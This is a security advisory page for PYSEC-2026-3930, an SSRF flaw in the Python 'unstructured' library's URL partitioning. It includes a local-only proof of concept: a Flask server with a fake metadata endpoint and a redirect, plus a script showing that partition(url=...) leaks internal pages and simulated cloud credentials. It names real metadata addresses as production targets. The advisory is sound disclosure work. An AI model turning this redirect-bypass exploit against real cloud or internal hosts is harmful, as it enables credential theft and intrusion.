PYSEC-2026-3930

    Dashboard / Vulnerabilities / PYSEC-2026-3930

    PYSEC-2026-3930

    Published: 10 Sept 2026Last Modified: 10 Sept 2026

    Summary: unstructured: Server-Side Request Forgery in the URL-based partitioning

    Details: ### Summary Server-Side Request Forgery in `unstructured`. The `url=` argument of `partition()`, `partition_html()`, and `partition_md()` is fetched via `requests.get()` with no host validation. The response body is returned as `Element` text, so this is a **full-read SSRF** — attackers reach loopback admin APIs, internal HTTP services, and cloud metadata endpoints, and read the response. `unstructured` is the de facto URL ingestion layer for LangChain `UnstructuredURLLoader`, LlamaIndex `UnstructuredReader`, Chainlit, and many agent frameworks — secure defaults must live in the library, not in every downstream caller. ### Details Three sinks, all in `unstructured == 0.22.26` (verified on `main` at `199f255`): - `unstructured/partition/auto.py:303` — `file_and_type_from_url()`, reached via `partition(url=…)`. - `unstructured/partition/html/partition.py:160` — `partition_html(url=…)`. Post-fetch `Content-Type` check runs after the request hits the target. - `unstructured/partition/md.py:96` — `partition_md(url=…)`. No timeout (SSRF + slow-loris DoS). None of `is_private`, `is_loopback`, `ipaddress`, `gethostbyname`, or `allow_redirects` appear in any of the three files. Three exploitation paths apply: direct private-IP target; redirect bypass (`allow_redirects=True` default); DNS rebinding (TOCTOU, closeable only by socket-pinning). Affected since `0.4.7` (Feb 2023) — ~219 releases, no validation ever introduced. ### PoC Local-only. `pip install unstructured==0.22.26 flask requests`. `internal_server.py`: ```python from flask import Flask, Response, jsonify app = Flask(__name__) @app.route("/imds") def imds(): return jsonify({"AccessKeyId": "ASIA-FAKE", "SecretAccessKey": "FAKE/SECRET"}) @app.route("/internal.html") def html(): return Response("<html><body><p>SK_LEAK_42</p></body></html>", mimetype="text/html") @app.route("/redir") def redir(): return Response("", 302, headers={"Location": "http://127.0.0.1:9999/imds"}) if __name__ == "__main__": app.run(host="127.0.0.1", port=9999) ``` `exploit.py` — uses the public top-level API: ```python # Stub NLP helpers so the offline sandbox skips spaCy model download. # Does NOT affect the SSRF (which lives in the URL fetcher, before NLP). import unstructured.nlp.tokenize as _tk, unstructured.partition.text_type as _tt _tk.sent_tokenize = _tt.sent_tokenize = lambda t: [s for s in (t or "").split(". ") if s] _tk.word_tokenize = _tt.word_tokenize = lambda t: (t or "").split() _tk.pos_tag = _tt.pos_tag = lambda t: [(w, "NN") for w in (t or "").split()] from unstructured.partition.auto import partition L = "http://127.0.0.1:9999" # A: partition(url=...) leaks internal HTML body assert "SK_LEAK_42" in "\n".join(str(e) for e in partition(url=f"{L}/internal.html", languages=["eng"])) # B: redirect bypass reaches simulated IMDS assert "SecretAccessKey" in "\n".join(str(e) for e in partition(url=f"{L}/redir", languages=["eng"])) print("PoC OK") ``` In production the attacker substitutes `169.254.169.254`, `metadata.google.internal`, or any internal address. ### Impact Attacker capabilities: - **Internal HTTP service read** — loopback admin consoles, internal Elasticsearch/Redis/Consul/etcd HTTP fronts, Kubernetes API server, social/internal microservices. This is the most broadly exploitable capability and is unaffected by any cloud-side hardening. - **Cloud instance metadata access** — reads metadata services that respond to unauthenticated GETs: GCP (`metadata.google.internal`), Azure IMDS, Oracle Cloud, DigitalOcean, and EC2 instances still configured for IMDSv1 (which remains widely deployed in older accounts and in services that do not enforce IMDSv2-only). EC2 instances configured as IMDSv2-only are not exposed to direct credential theft via this SSRF, since IMDSv2 requires a `PUT` for token acquisition; the SSRF still reaches the endpoint for reconnaissance and surface-mapping. - **Side-effecting GET endpoints** — magic-link consumers, job triggers, link-preview generators reachable on internal networks. - **Internal network reconnaissance** — connection success/failure timing and error messages serve as a port and service scanner.

    Affected packages

    Package

    Name: unstructured

    Purl: pkg:pypi/unstructured

    Affected ranges

    Type: ECOSYSTEM

    Events:

    Introduced- 0.4.7
    Fixed -0.24.0

    Affected versions

    0.10.0
    0.10.1
    0.10.10
    0.10.11
    0.10.12
    0.10.13
    0.10.14
    0.10.15
    0.10.16
    0.10.18
    0.10.19
    0.10.19.dev18
    0.10.2
    0.10.20
    0.10.21
    0.10.22
    0.10.23
    0.10.24
    0.10.25
    0.10.26
    0.10.27
    0.10.28
    0.10.29
    0.10.30
    0.10.4
    0.10.5
    0.10.6
    0.10.7
    0.10.8
    0.10.9

    Common Vulnerability Scoring System

    Attack Vector
    Network
    Adjacent
    Local
    Physical
    Privileges Required
    None
    Low
    High
    User Interaction
    None
    Required
    Scope
    Unchanged
    Changed
    Confidentiality
    None
    Low
    High
    Integrity
    None
    Low
    High
    Availability
    None
    Low
    High
    PYSEC-2026-3930 | CVE-DB